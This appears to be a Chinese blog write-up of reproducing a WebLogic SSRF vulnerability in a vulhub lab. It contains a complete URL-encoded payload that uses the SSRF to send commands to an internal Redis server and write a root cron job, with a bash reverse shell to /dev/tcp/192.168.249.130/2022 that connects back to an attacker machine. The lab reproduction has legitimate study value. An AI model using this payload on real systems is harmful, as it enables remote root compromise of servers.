weblogic ssrf漏洞复现

女爷i 2023-10-08 20:51 66阅读 0赞

SSRF简介

SSRF是一种由攻击者构造形成有服务器发起求情的一个安全漏洞,一般情况下,攻击目标是从外网无法访问的内部系统,正是因为它由服务端发起的,所以他能请求到与他相连而与外网隔离点内部系统。

环境搭建

kali:192.168.249.130

ubantu:192.168.249.137

vulhub地址:https://vulhub.org/\#/environments/weblogic/ssrf/

  1. 启动服务

    docker-compose up -d

02c87584e78dea9c81a9f17bd62b5be9.png

  1. 访问http://192.168.249.137:7001/uddiexplorer

729f2f61fd5e4f78992761d1af1cd36a.png

  1. Ssrf漏洞位于:http://192.168.249.137:7001/uddiexplorer/SearchPublicRegistries.jsp点击search用burp抓包

40324d878cb56a695a0d716d61bde8c9.png

0a3644e5c660e341f7773cf567d4e274.png

  1. 发送到repeater,更改operator参数的值为127.0.0.1:7001,得到错误,一般是返回status code

如果指定端口开放则会返回带有404内容的提示

d517605840a99d6d7e7d938718094925.png

  1. 访问的端口未开放会出现not connect over

5240d07160f4bcc4fa546f5333d71ee1.png

  1. 进入容器,查看服务器ip 172.25.0.2,(不要进错容器)

    docker exec -it 7ba /bin/bash

9de6ed1d79a3991e56589cf8161eae49.png

9d1fa1a9e57387bc9352eab77e693e13.png

  1. 探测redis容器是否开放6379端口 ,回显内容表示存在该服务

39e229b3431db067cf04f772e1af373b.png

利用Redis反弹shell

  1. 发送三条redis命令,将反弹shell脚本写入/etc/crontab

test
set 1 “\n\n\n\n* * * * * root bash -i >& /dev/tcp/**虚拟机的ip/2022 0>&1\n\n\n\n” config set dir /etc/ config set dbfilename crontab save test**

  1. URL编码:

test%0D%0A%0D%0Aset%201%20%22\n\n\n\n*%20*%20*%20*%20*%20root%20bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F 192.168.249.130%2F 2022%200%3E%261\n\n\n\n%22%0D%0Aconfig%20set%20dir%20%2Fetc%2F%0D%0Aconfig%20set%20dbfilename%20crontab%0D%0Asave%0D%0A%0D%0Aqwezxc

  1. 构造payload (注意标红改为自己对应ip),访问

http:// 192.168.249.137:7001 /uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http:// 172.25.0.2:6379 /test%0D%0A%0D%0Aset%201%20%22\n\n\n\n*%20*%20*%20*%20*%20root%20bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F 192.168.249.130 %2F 2022 %200%3E%261\n\n\n\n%22%0D%0Aconfig%20set%20dir%20%2Fetc%2F%0D%0Aconfig%20set%20dbfilename%20crontab%0D%0Asave%0D%0A%0D%0Aqwezxc

打开kali监听

稍等片刻,成功反弹shell

7d926c40c74ff98e0749b092c9986143.png

0efd786ef4c3aef98c24ca3cb0bfa6cf.png

发表评论

表情:
评论列表 (有 0 条评论,66人围观)

还没有评论,来说两句吧...

相关阅读

    相关 weblogic ssrf漏洞

    SSRF简介 SSRF是一种由攻击者构造形成有服务器发起求情的一个安全漏洞,一般情况下,攻击目标是从外网无法访问的内部系统,正是因为它由服务端发起的,所以他能请求到与他相

    相关 XSS漏洞

    XSS漏洞复现 实验环境DVWA > XSS(cross site script) 跨站脚本。属于代码执行的一种,这里执行的是前端代码,一般是javascript代码。